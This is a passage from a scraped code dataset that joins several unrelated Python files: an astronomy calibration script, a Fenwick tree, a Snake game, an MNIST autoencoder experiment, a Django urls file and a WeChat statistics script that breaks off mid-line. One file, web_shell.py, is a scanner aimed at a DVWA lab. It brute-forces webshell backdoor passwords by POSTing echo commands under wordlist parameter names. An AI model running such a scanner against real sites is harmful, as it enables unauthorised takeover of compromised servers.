os.path.basename(p['FITSFILENAME'])\n # construct file name and path\n fpmasterfits, tag = spirouConfig.Constants.SLIT_MASTER_FP_FILE(p)\n fpmasterfitsname = os.path.basename(fpmasterfits)\n # Log that we are saving tilt file\n wmsg = 'Saving master FP file: {0}'\n WLOG(p, '', wmsg.format(fpmasterfitsname))\n # Copy keys from fits file\n hdict = spirouImage.CopyOriginalKeys(fphdr)\n # add version number\n hdict = spirouImage.AddKey(p, hdict, p['KW_VERSION'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_DATE'], value=p['DRS_DATE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DATE_NOW'], value=p['DATE_NOW'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_PID'], value=p['PID'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag)\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBDARK'], value=p['DARKFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBBAD'], value=p['BADPFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBLOCO'], value=p['LOCOFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE1'],\n dim1name='hcfile', values=p['HCFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE2'],\n dim1name='fpfile', values=p['FPFILES'])\n # add qc parameters\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_QC'], value=p['QC'])\n hdict = spirouImage.AddQCKeys(p, hdict, qc_params)\n # write tilt file to file\n p = spirouImage.WriteImageTable(p, fpmasterfits, image=masterfp,\n table=fptable, hdict=hdict)\n\n # ------------------------------------------------------------------\n # Writing sanity check files\n # ------------------------------------------------------------------\n if p['SHAPE_DEBUG_OUTPUTS']:\n # log\n WLOG(p, '', 'Saving debug sanity check files')\n # construct file names\n input_fp_file, tag1 = spirouConfig.Constants.SLIT_SHAPE_IN_FP_FILE(p)\n output_fp_file, tag2 = spirouConfig.Constants.SLIT_SHAPE_OUT_FP_FILE(p)\n input_hc_file, tag3 = spirouConfig.Constants.SLIT_SHAPE_IN_HC_FILE(p)\n output_hc_file, tag4 = spirouConfig.Constants.SLIT_SHAPE_OUT_HC_FILE(p)\n bdxmap_file, tag5 = spirouConfig.Constants.SLIT_SHAPE_BDXMAP_FILE(p)\n # write input fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag1)\n p = spirouImage.WriteImage(p, input_fp_file, loc['FPDATA1'], hdict)\n # write output fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag2)\n p = spirouImage.WriteImage(p, output_fp_file, loc['FPDATA2'], hdict)\n # write input fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag3)\n p = spirouImage.WriteImage(p, input_hc_file, loc['HCDATA1'], hdict)\n # write output fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag4)\n p = spirouImage.WriteImage(p, output_hc_file, loc['HCDATA2'], hdict)\n # write overlap file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag5)\n p = spirouImage.WriteImage(p, bdxmap_file, loc['DXMAP0'], hdict)\n\n # ----------------------------------------------------------------------\n # Move to calibDB and update calibDB\n # ----------------------------------------------------------------------\n if p['QC']:\n # add shape x\n keydb = 'SHAPEX'\n # copy shape file to the calibDB folder\n spirouDB.PutCalibFile(p, shapexfits)\n # update the master calib DB file with new key\n spirouDB.UpdateCalibMaster(p, keydb, shapexfitsname, fphdr)\n # add shape y\n keydb = 'SHAPEY'\n # copy shape file to the calibDB folder\n spirouDB.PutCalibFile(p, shapeyfits)\n # update the master calib DB file with new key\n spirouDB.UpdateCalibMaster(p, keydb, shapeyfitsname, fphdr)\n # add fp master\n keydb = 'FPMASTER'\n # copy shape file to the calibDB folder\n spirouDB.PutCalibFile(p, fpmasterfits)\n # update the master calib DB file with new key\n spirouDB.UpdateCalibMaster(p, keydb, fpmasterfitsname, fphdr)\n # ----------------------------------------------------------------------\n # End Message\n # ----------------------------------------------------------------------\n p = spirouStartup.End(p)\n # return a copy of locally defined variables in the memory\n return dict(locals())\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # run main with no arguments (get from command line - sys.argv)\n ll = main()\n # exit message if in debug mode\n spirouStartup.Exit(ll)\n\n# =============================================================================\n# End of code\n# =============================================================================\n","sub_path":"old_code/INTROOT/bin/cal_shape_master_spirou.py","file_name":"cal_shape_master_spirou.py","file_ext":"py","file_size_in_byte":28039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"421156217","text":"# webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。\n# 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,\n# 然后就可以使用浏览器来访问asp或者php后门,\n# 得到一个命令执行环境,以达到控制网站服务器的目的。\n# getshell 取得权限\nimport os\nimport sys\nfrom lib.download import Downloader\nimport time\n\nfilename = os.path.join(sys.path[0], \"data\", \"web_shell.txt\")\npayloads = []\nf = open(filename)\na = 0\nfor i in f:\n payloads.append(i.strip())\n a += 1\n if a == 999:\n break\n # 对每个.php结尾的文件进行一句话爆破\n\n\ndef run(url, flag=0, loginUrl='', loginData=''):\n if not url.endswith(\".php\"):\n return False\n download = Downloader(flag, loginUrl=loginUrl, loginData=loginData)\n post_data = {}\n now = time.time()\n for payload in payloads:\n post_data[payload] = 'echo \"password is {}\";'.format(now)\n\n# 变量=echo “ok”;\n# 如果这个变量等于密码的时候,我们的语句就会被传参带入执行,那如果我们批量提交(即a=echo “ok”;&b=echo “ok”;&c=echo “ok”;&….)呢\n# 只要我们提交的参数中含有实际的参数,就可被接收。\n r = download.post(url, post_data)\n\n if str(now) in r:\n return url\n return False\n\n\nif __name__ == '__main__':\n run('http://192.168.220.132/dvwa/vulnerabilities/fi/?page=include.php', 1)","sub_path":"web_shell.py","file_name":"web_shell.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638012449","text":"from typing import Iterable, TypeVar, Callable\n\nT = TypeVar('T')\n\n\"\"\"\nTraditionally Fenwick Trees operate on arrays of integers. They were concieved for the purposes of supporting two operations\nefficiently:\n1) Sum up the first k elements in the array\n2) Add a value x to the kth element in the array\n\nIn a traditional array A, 1) would take O(n) time and 2) would take O(1) time.\nIf you were to transform the array A into a cumulative sum array B, 1) would take O(1) time\nbut 2) would take O(n) time as you need to update all cumulative sums containing the updated element.\n\nThe Fenwick tree meets halfway between both approaches and supports 1) and 2) in O(log n) time. It is should ideally be used when you envision\na sequence of elements and you have a lot sum queries and a lot of update queries.\n\nWhile traditionally Fenwick Trees operate on arrays of integers and sums, the data structure below\nis abstract enough to be used for any iterable of any type T (other than integer) w/ an associative binary operation (that represents +)\n\"\"\"\nclass FenwickTree:\n def __init__(self, a: Iterable[T], op: Callable[[T, T], T], identity: T) -> None:\n \"\"\"\n Args:\n param1: a is an iterable of any type.\n param2: op is an associative binary operator with identity on T.\n param3: identity is the identity of T under the operation op\n\n To be concise (T, op) form a monoid\n\n Returns:\n None. This is a constructor for a fenwick tree\n\n Raises: Does not throw an exception\n\n Time complexity: O(nlogn) for constructing this data structure\n \"\"\"\n self.a = list(a)\n self.op = op\n self.identity = identity\n self.f_tree = [identity] * (len(a) + 1)\n for i, elem in enumerate(a):\n self.update(i, elem)\n\n\n def reduce(self, i : int) -> T:\n \"\"\"\n Args:\n param1: i is an index of the sequence 'a' used to construct the fenwick tree.\n Returns:\n result represents reducing the subsequence a[:i] under the binary operator op\n\n Raises: Throws a ValueError exception if an invalid index is passed\n\n Time Complexity : O(log n) where n is the number of elements in a\n \"\"\"\n if i >= len(self.a) or i < 0:\n raise ValueError(\"Invalid index operation\")\n index = i + 1\n result = self.identity\n while index > 0:\n ## Get rid of the least significant bit\n result = self.op(result, self.f_tree[index])\n index = index - (index & -index)\n return result\n\n def update(self, i: int, val: T) -> None:\n \"\"\"\n Args:\n param1: i is an index of the sequence 'a' used to construct the fenwick tree.\n\n Returns: None\n\n Effects:\n Effectively equivalent to doing a[i] = op(a[i], val)\n\n Time Complexity : O(log n) where n is the number of elements in a\n\n Raises: Throws a ValueError exception if an invalid index is passed\n \"\"\"\n if i >= len(self.a) or i < 0:\n raise ValueError(\"Invalid index operation\")\n index = i + 1\n while index <= len(self.f_tree):\n self.f_tree[index] = self.op(self.f_tree[index], val)\n index += (index & -index)\n return\n\nif __name__ == '__main__':\n a = FenwickTree([1,2,3,4,5,6], lambda x, y: x + y, 0)\n print(a.reduce(2))\n print(a.reduce(0))\n a.update(3, 100)\n print(a.reduce(3))\n","sub_path":"FenwickTree/fenwick_tree.py","file_name":"fenwick_tree.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"427977702","text":"\nimport pygame as pg\nimport time\nimport random as r\nimport math as m\n\nclass SnakeGame:\n\n def __init__(self, dim, square_interval):\n self.SNAKE_COLOR = (255,255,255)\n self.FOOD_COLOR = (255,100,100) \n self.BORDER_COLOR = (75,75,75)\n\n self.x = dim\n self.y = dim\n \n self.snake_dimensions = square_interval//2\n self.i = square_interval\n self.interval = dim//square_interval\n\n self._reset_game()\n \n def _convert_real_pos_to_block(self, pos):\n # Converts a coordinate on the screen to an interval coordinate\n x, y = pos\n return (x // self.i, y // self.i) \n\n def _convert_block_pos_to_real(self, pos):\n # Converts an interval coordinate to a screen coordinate\n x, y = pos\n return (x*self.i, y*self.i)\n\n def _get_random_location(self):\n availabe = []\n\n # Get a list of all possible locations that are not occupied or on an edge\n for row in range(self.interval):\n for col in range(self.interval):\n if self.grid[row][col] == 0 and (0 < row < self.interval - 1) and (0 < col < self.interval - 1):\n availabe.append((col, row))\n return r.choice(availabe)\n\n def _reset_board(self):\n\n self.grid = []\n \n # Reset grid and draw border on grid\n for row in range(self.interval):\n a = []\n for col in range(self.interval):\n if row == 0 or col == 0 or row == self.interval-1 or col == self.interval-1:\n a.append(3)\n else:\n a.append(0)\n self.grid.append(a)\n\n def _reset_game(self):\n\n # Reset the game and init params\n self._reset_board()\n self.game_over = False\n self.snake_length = 2\n self.curr_snake_positions = [(self.interval//2, self.interval//2)]\n self.curr_food_position = self._get_random_location()\n self.curr_snake_dir = r.randint(0, 3)\n\n def get_game_state(self):\n \n \"\"\"\n 0 - Game is over\n 1 - Game is in progress\n 2 - Player won\n \"\"\"\n \n if self.game_over:\n return 0\n else:\n a = False\n for row in range(self.interval):\n for col in range(self.interval):\n if self.grid[row][col] == 0:\n a = True\n return int(a) + 1\n\n def run_game(self, frame_rate):\n\n screen = pg.display.set_mode((self.x, self.y))\n \n game = 0\n\n while True:\n \n self._reset_game()\n\n while self.get_game_state():\n\n screen.fill((0,0,0))\n self._reset_board()\n\n # Draw Border\n pg.draw.rect(screen, self.BORDER_COLOR, (0, 0, self.x, self.snake_dimensions*2))\n pg.draw.rect(screen, self.BORDER_COLOR, (0, 0, self.snake_dimensions*2, self.y))\n pg.draw.rect(screen, self.BORDER_COLOR, (0, self.y - self.snake_dimensions*2, self.x, self.snake_dimensions*2))\n pg.draw.rect(screen, self.BORDER_COLOR, (self.x - self.snake_dimensions*2, 0, self.snake_dimensions*2, self.y))\n\n for position in self.curr_snake_positions:\n sx, sy = position\n\n # Check If Snake Ate Itself\n if self.grid[sy][sx] == 1 or sx <= 0 or sy <= 0 or sx >= self.interval-1 or sy >= self.interval-1:\n self.game_over = True\n break\n \n # Draw Snake\n rx, ry = self._convert_block_pos_to_real(position)\n pg.draw.rect(screen, self.SNAKE_COLOR, (rx, ry, self.snake_dimensions*2, self.snake_dimensions*2)) \n self.grid[sy][sx] = 1\n \n if self.get_game_state:\n\n # Draw Food\n fx, fy = self.curr_food_position\n rfx, rfy = self._convert_block_pos_to_real(self.curr_food_position)\n pg.draw.rect(screen, self.FOOD_COLOR, (rfx, rfy, self.snake_dimensions*2, self.snake_dimensions*2)) \n self.grid[fy][fx] = 2\n \n pg.display.update()\n \n # Check If Snake Ate Food\n if self.curr_snake_positions[0] == self.curr_food_position:\n self.curr_food_position = self._get_random_location() \n self.snake_length += 1\n\n e = pg.event.poll()\n if e.type == pg.QUIT:\n return\n\n keys = pg.key.get_pressed()\n \n if keys[pg.K_ESCAPE] or keys[pg.K_SLASH]:\n return\n \n # Get Keyboard Input\n if (keys[pg.K_UP] or keys[pg.K_w]) and self.curr_snake_dir != 1:\n self.curr_snake_dir = 0\n elif (keys[pg.K_LEFT] or keys[pg.K_a]) and self.curr_snake_dir != 3:\n self.curr_snake_dir = 2\n elif (keys[pg.K_DOWN] or keys[pg.K_s]) and self.curr_snake_dir != 0:\n self.curr_snake_dir = 1\n elif (keys[pg.K_RIGHT] or keys[pg.K_d]) and self.curr_snake_dir != 2:\n self.curr_snake_dir = 3\n\n # Update Direction Vector Based on Movement State\n if self.curr_snake_dir == 0:\n self.direction_vector = (0, -1)\n elif self.curr_snake_dir == 1:\n self.direction_vector = (0, 1)\n elif self.curr_snake_dir == 2:\n self.direction_vector = (-1, 0)\n elif self.curr_snake_dir == 3:\n self.direction_vector = (1, 0)\n \n dx, dy = self.direction_vector\n curr_x, curr_y = self.curr_snake_positions[0]\n pos = ((curr_x + dx) % self.interval, (curr_y + dy) % (self.interval)) \n \n # Pop end of snake to maintain size\n self.curr_snake_positions.insert(0, pos)\n if len(self.curr_snake_positions) > self.snake_length:\n self.curr_snake_positions.pop()\n\n # Delay to conrol frame rate\n time.sleep(1/frame_rate)\n\n print(\"GAME OVER.\", \"Score:\", self.snake_length) \n game += 1\n \n\ndef main():\n snake = SnakeGame(500, 20)\n snake.run_game(15)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"keyboard_snake.py","file_name":"keyboard_snake.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368121673","text":"from keras.layers import Input, Dense, Conv2D, MaxPooling2D, UpSampling2D, Flatten, Reshape, RepeatVector,Add\nfrom keras.models import Model\nfrom keras.datasets import mnist\nfrom keras import regularizers\nimport numpy as np\nfrom keras.callbacks import TensorBoard\nimport random as rand\nimport copy\nfrom keras import backend as K\nfrom keras import metrics\nimport math\nimport matplotlib.pyplot as plt\nimport pickle\nfrom sklearn.metrics import mean_squared_error as mse\nfrom skimage.transform import rescale, resize, downscale_local_mean\n\ntrain_model = True\nfraction_of_data = 1.0\noptimizer_type = 'adadelta'\nbatch_size = 20\nnum_epochs = 5\n\ndef squared_error(a,b):\n return K.square(a-b)\nerror_function = squared_error # metrics.mse\nmin_num_data_points = 3000\nRewardError = False\nRewardBasedResampling = True\n#noisy to noisy only matters if occlude is true\nInputToOutputType = 1 #1-True to True 2-True to Noisy 3-Noisy to True 4-Noisy to Noisy\n #the other option is True input to noisy output. Noisy to Noisy makes sense only because we never truly train\n #on weaker images, we noise them , so pay less importance. if it is True to noisy, then we are learning to\n #occlude , which is not really our goal\nOcclude = InputToOutputType != 1\nSparsity = False\nArray_Error = True\nInvert_Img_Negative = False\nNegative_Error_From_Reward = False#todo set to false as default\nPredict_on_test = False\nResample = False\nif RewardBasedResampling or Occlude or Invert_Img_Negative:\n Resample = True\n\n# dict_num_reward = {0:1, 1:1, 2:1, 3:1, 4:1, 5:1, 6:1, 7:1, 8:1, 9:1}\n# dict_num_reward = {0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0}\ndict_num_reward = {0:0, 1:1, 2:0, 3:0, 4:1, 5:0, 6:0, 7:1, 8:0, 9:0}\n# dict_num_reward = {0:0, 1:0, 2:0, 3:0.3, 4:0, 5:0, 6:0.3, 7:0, 8:1, 9:0}\n# dict_num_reward = {0:0, 1:0, 2:1, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0 }\n\n\ndef get_reward_string():\n string_repr = \"_\"\n for key in dict_num_reward.keys():\n if dict_num_reward[key] != 0:\n string_repr += str(key) + str(dict_num_reward[key]).replace(\".\",\"\") + \"_\"\n return string_repr[:-1]\n #--end for\n\n\nmodel_weights_file_name = \"RECURSIVE_1_hidden_node_CNN_AE\"\nif RewardError: model_weights_file_name += \"_RewErr\"\nif Resample: model_weights_file_name += \"_Rsmpl\"\nif Sparsity: model_weights_file_name += \"_Sprs\"\nif Array_Error: model_weights_file_name += \"_ArrErr\"\nmodel_weights_file_name += \"_\" + \"inOutType\" + str(InputToOutputType)\nmodel_weights_file_name += \"_\" + optimizer_type + \"_\" + str(batch_size)\nmodel_weights_file_name += get_reward_string()\n\n# model_weights_file_name = \"CNN_ae_weights_ResampleOcclude_NoiseToNoise_148.kmdl\"\n#=============================================\n#prep the data\n(x_train,y_train) , (x_test,y_test) = mnist.load_data()\nx_train = x_train[0:int(len(x_train)*fraction_of_data)]\ny_train = y_train[0:int(len(y_train)*fraction_of_data)]\nx_train = x_train.astype('float32')/255\nx_test = x_test.astype('float32')/255\nx_train = x_train.reshape((len(x_train),28,28,1))\nx_test = x_test.reshape((len(x_test),28,28,1))\nx_train_original = copy.deepcopy(x_train)\nprint (x_train.shape)\nprint (x_test.shape)\n\n\n#=============================================\n\ndef mnist_reward(in_value):\n # for pure dict values\n return dict_num_reward[in_value]\n\n#=============================================\ncumulative_reward = 0.0\nx_test_reward = np.array([mnist_reward(y_test[i]) for i in range(len(y_test))]) #this is necessary for the test set\nx_train_reward = np.array([mnist_reward(y_train[i]) for i in range(len(y_train))]) #this is necessary for the train set\nx_train_target = x_train_original\ntest_fitted_length = int(x_test.shape[0] / batch_size) * batch_size\nx_test = x_test[0:test_fitted_length]\nx_test_reward = x_test_reward[0:test_fitted_length]\n\ndef keep_sample_by_reward():\n\n global x_train_target,x_train_original,x_train_reward,y_train\n sampled_xtrain_target = []\n sampled_ytrain = []\n sampled_x_train_original = []\n sampled_x_train_reward = []\n while len(sampled_x_train_reward) < min_num_data_points:\n index_list = np.array(list(range(x_train.shape[0])))\n np.random.shuffle(index_list)\n for index in index_list:\n curr_reward = mnist_reward(y_train[index])\n if curr_reward == 0 and RewardError == True:\n continue #no point in a data point with zero reward, as the error would be 0\n # formula for (sampling) = e ^ (-1 * sum * reward) / e ^ (| sum |)\n prob_sampling = curr_reward\n # prob_sampling\n cutoff = np.random.rand()\n if cutoff < prob_sampling or RewardBasedResampling == False:\n main_image = copy.deepcopy(x_train[index])\n\n #also modify the image by adding noise based on (1-reward)\n if Occlude:\n noise_mask = np.random.rand(x_train.shape[1], x_train.shape[2], x_train.shape[3])\n noise_mask = np.less(noise_mask,1-abs(curr_reward)) # so if the noise factor was 0.4 (reward = 0.6), then\n # only those nodes where value is less than 0.4 will be 1\n noise_layer = np.random.rand(x_train.shape[1], x_train.shape[2], x_train.shape[3])# THIS is the actual noise value. DIFFERENT from the one used to generate mask\n # noise_layer = np.zeros(shape=(28, 28, 1)) #THIS is if you want the background to go to black.\n main_image = main_image*(1 - noise_mask) + noise_layer * noise_mask\n #save this\n sampled_xtrain_target.append(main_image)\n sampled_ytrain.append(y_train[index])\n sampled_x_train_reward.append(curr_reward)\n sampled_x_train_original.append(x_train_original[index])\n #---END for loop through index of data points\n #-end while loop\n #now trim to the batch size\n fitted_length = int(len(sampled_x_train_reward)/batch_size)*batch_size\n x_train_target = np.array(sampled_xtrain_target[0:fitted_length])\n x_train_original = np.array(sampled_x_train_original[0:fitted_length])\n x_train_reward = np.array(sampled_x_train_reward[0:fitted_length])\n y_train = np.array(sampled_ytrain[0:fitted_length])\n\n\n#=============================\n\nif Resample and train_model:\n keep_sample_by_reward()\nelse: #dont resample\n x_train_target = x_train_original\n pass\n#=============================\n\n\nx_test_approx = np.zeros(x_test.shape)\nx_test_target = copy.deepcopy(x_test)\nx_train_approx = np.zeros(x_train_original.shape)\n\n# encoding_dim = 32\ninput_img = Input(shape=(28,28,1))\nprev_approx_img = Input(shape=(28,28,1))\ntarget_img = Input(shape=(28,28,1))\n\n\"\"\"\nNN design algo\nThere are many repeat NN, each trained sequentially.\n1) Train v1, evaluate the results for the dataset.\n2) subtract the original dataset with the evaluated results. \n3) Save v1 weights with _v1 suffix\n4) Reset the weights (? or not) and train the model on the modified dataset.\n5) Repeat\n\nDebug by looking at the resultant images wrt to the original or prev data set.\nDebug by only training on 8s to begin with.\n\"\"\"\n\nx = Conv2D(8,(2,2),activation='tanh')(input_img)\n\nflat_layer = Flatten()(x)\ndense_layer = Dense(1, activation=\"tanh\")(flat_layer)\n\ndense_feature_layer = Dense(int(14*14),activation=\"tanh\")(dense_layer)\nencoded = Reshape([14,14,1])(dense_feature_layer)\nx = Conv2D(8,(2,2),activation='tanh',padding=\"same\")(encoded)\nx = UpSampling2D((2,2))(x)\ndecoded = Conv2D(1,(2,2),activation='tanh',padding='same')(x)\ndecoded = Add()([decoded,prev_approx_img])\n\n\n#todo revisit good performing network\n# x = Conv2D(8,(2,2),activation='tanh')(input_img)\n#\n# flat_layer = Flatten()(x)\n# dense_layer = Dense(1, activation=\"tanh\")(flat_layer)\n#\n# dense_feature_layer = Dense(int(28*28),activation=\"tanh\")(dense_layer)\n# encoded = Reshape([28,28,1])(dense_feature_layer)\n# x = Conv2D(8,(2,2),activation='tanh',padding=\"same\")(encoded)\n# decoded = Conv2D(1,(2,2),activation='tanh',padding='same')(x)\n# decoded = Add()([decoded,prev_approx_img])\n\n\n#todo revisit model without bias\n# x = Conv2D(8,(2,2),activation='tanh',use_bias=False)(input_img)\n#\n# # x = MaxPooling2D((2,2),padding='same')(x)\n# # x = Conv2D(8,(2,2),activation='tanh')(x)\n# # x = MaxPooling2D((2,2),padding='same')(x)\n# # x = Conv2D(8,(2,2),activation='tanh')(x)\n#\n# flat_layer = Flatten()(x)\n# dense_layer = Dense(1, activation=\"tanh\",use_bias=False)(flat_layer)\n#\n# dense_feature_layer = Dense(int(28*28),activation=\"tanh\",use_bias=False)(dense_layer)\n# encoded = Reshape([28,28,1])(dense_feature_layer)\n# x = Conv2D(8,(2,2),activation='tanh',padding=\"same\",use_bias=False)(encoded)\n# decoded = Conv2D(1,(2,2),activation='tanh',padding='same',use_bias=False)(x)\n# decoded = Add()([decoded,prev_approx_img])\n\n\n\n\nif Array_Error:\n loss_value = error_function(target_img,decoded)\nelse: # not array error\n loss_value = K.mean(error_function(target_img, decoded))\n\nautoencoder = Model([input_img,prev_approx_img,target_img], decoded)\nautoencoder.add_loss(loss_value)\nautoencoder.compile(optimizer=optimizer_type)\n\n\n#encoder model\nencoder = Model (input_img,encoded)\n#decoder model\n\n\n#find the indices of two of each class\n# needed_numbers = [0,1,2,3,4,5,6,7,8,9]\n# needed_numbers = [0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9]\n# needed_numbers = [8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8]\n# needed_numbers = [5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5]\n# needed_numbers = [7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7]\n# needed_numbers = [4,4,4,4,4,4,4,4,4,1,1,1,1,1,8,8,8,8,8,8]\nneeded_numbers = [i for i in dict_num_reward.keys() if dict_num_reward[i]>0]\nneeded_numbers = needed_numbers * 20 #this will be more than the images, but thats ok. There are checks in place to break out\ntarget_indices = []\ncurr_index = rand.randint(100,1000)\n\n\ny_target = y_train\nsource_images = x_train_target\nif Predict_on_test:\n y_target = y_test\n source_images = x_test\nfor number in needed_numbers:\n while True:\n curr_index += 1\n if curr_index % len(y_target ) == 0:\n curr_index = 0\n break\n if y_target[curr_index] == number:\n target_indices.append(curr_index)\n break\n #end while\n#end outer for\n\n\nif not train_model:\n pass#todo fill the iterative load and evaluate here as well. OR BETTER create many copies of the model and load\n # autoencoder.load_weights(filepath=model_weights_file_name)\nelse:\n # InputToOutputType = 4 # 1-True to True 2-True to Noisy 3-Noisy to True 4-Noisy to Noisy\n # x_train_original, x_train_target\n source_images = x_train_original\n target_images = x_train_original\n if InputToOutputType == 2:\n target_images = x_train_target\n if InputToOutputType == 3 or InputToOutputType == 4:\n source_images = x_train_target\n\n #todo THINK IF THIS IS GOOD. I think it is, so all the AE units start with the same weights (connected)\n autoencoder.save_weights(\"default_init_weights.kmdl\")\n output_images_iter_list = []\n output_images_testSet_iter_list = []\n\n if train_model == False:\n for i in range(3):\n #todo complete this code. It should not be here, only when predicting\n autoencoder.load_weights(model_weights_file_name + \"_L\" + str(i) + \".kmdl\")\n\n\n else:\n for i in range(6):\n autoencoder.load_weights(\"default_init_weights.kmdl\")\n if RewardError:\n pass\n else:\n autoencoder.fit([source_images,x_train_approx,target_images],epochs=num_epochs ,batch_size=batch_size,\n shuffle=True,validation_data=([x_test,x_test_approx,x_test_target],None))\n autoencoder.save_weights(model_weights_file_name+\"_L\"+str(i)+\".kmdl\")\n #now update the data for the next iteration.\n output_images = autoencoder.predict([source_images,x_train_approx,target_images])\n output_images_testSet = autoencoder.predict([x_test,x_test_approx,x_test])\n # output_images_iter_list.append(output_images)\n # output_images_testSet_iter_list.append(output_images_testSet)\n x_train_approx = output_images # todo NOTE: do NOT compound the images, else the error of the first image adds on.\n # source_images = source_images - output_images # keep target images the same\n source_images = source_images # keep target images the same\n\n x_test_approx = output_images_testSet\n # x_test = x_test - output_images_testSet\n x_test = x_test\n\n # n = 20 # number of images to be displayed\n # plt.figure(figsize=(20, 4))\n # plt.suptitle(model_weights_file_name)\n # for i in range(n):\n # if i >= len(target_indices):\n # break\n # ax = plt.subplot(2, n, i + 1)\n #\n # plt.imshow(source_images[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n #\n # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(True) # just for fun\n # # display reconstruction\n # ax = plt.subplot(2, n, i + 1 + n)\n # plt.imshow(output_images[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n # # a = source_images[target_indices[i]].reshape(source_images[0].shape[:-1])\n # # b = decoded_imgs[target_indices[i]].reshape(source_images[0].shape[:-1])\n # # final_mse = mse(a,b)\n # # plt.title(\"mse=\", str(final_mse))\n # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(False)\n # plt.show()\n\n\ndecoded_imgs = output_images_iter_list[0]\nfor delta_set in output_images_iter_list[1:]:\n decoded_imgs += delta_set\n\n\nn=20 #number of images to be displayed\nplt.figure(figsize=(20,4))\nplt.suptitle(model_weights_file_name)\n\nfor i in range(n):\n if i >= len(target_indices):\n break\n ax = plt.subplot(2,n,i+1)\n\n\n plt.imshow(source_images[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(True)#just for fun\n #display reconstruction\n ax = plt.subplot(2,n,i+1+n)\n plt.imshow(decoded_imgs[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n # a = source_images[target_indices[i]].reshape(source_images[0].shape[:-1])\n # b = decoded_imgs[target_indices[i]].reshape(source_images[0].shape[:-1])\n # final_mse = mse(a,b)\n # plt.title(\"mse=\", str(final_mse))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()\n","sub_path":"Autoencoders/AE_modulations/Recurs_Single_hidden_node_feature_MNIST.py","file_name":"Recurs_Single_hidden_node_feature_MNIST.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534912622","text":"# standard libraris\nfrom django.urls import include, path\n\"\"\"\nApi urls registration for user, auth, and books aplication\n\"\"\"\nurlpatterns = [\n path('users/', include('users.urls')),\n path('rest-auth/', include('rest_auth.urls')),\n path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('books/', include('books.urls'))\n]","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"382859290","text":"import itchat\nimport numpy as np\nimport pandas as pd\nfrom collections import defaultdict\nimport re\nimport jieba\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom wordcloud import WordCloud,ImageColorGenerator\nimport PIL.Image as Image\n\n# 微信登陆,会跳出二维码,手机微信扫码登陆即可\nitchat.login()\nfriends = itchat.get_friends(update=True)\n# 获取自己的昵称,自己的索引为0\nmyNickName = friends[0].NickName\n# 建立以昵称为文件名的文件夹\nisExist = os.path.exists(myNickName)\nif not isExist:\n os.mkdir(myNickName)\n\n# file = '\\{}'.format(NickName)\nfile = '\\%s' %myNickName\n# 获得当前路径\ncp = os.getcwd()\n# 路径拼接\npath = os.path.join(cp + file)\n# 切换路径\nos.chdir(path)\n\nnumber_of_friends = len(friends)\nprint(number_of_friends)\n# 将friends转换为pandas DataFrame格式\ndf_friends = pd.DataFrame(friends)\n\n# 获得朋友性别数,获得男、女性别数\ndef get_sex_count(Sequence):\n counts = defaultdict(int)\n for x in Sequence:\n counts[x] += 1\n return counts\n\nSex = df_friends.Sex\nprint(Sex)\n# Sex_count1为一个字典\nSex_count1 = get_sex_count(Sex)\nprint(Sex_count1)\n# pandas为Series提供了一个value_counts()方法,可以更方便统计各项出现的次数\nSex_count2 = Sex.value_counts()\nprint(Sex_count2)\n\n# 获得省份信息\nProvince = df_friends.Province\nProvinde_count = Province.value_counts()\nProvinde_count = 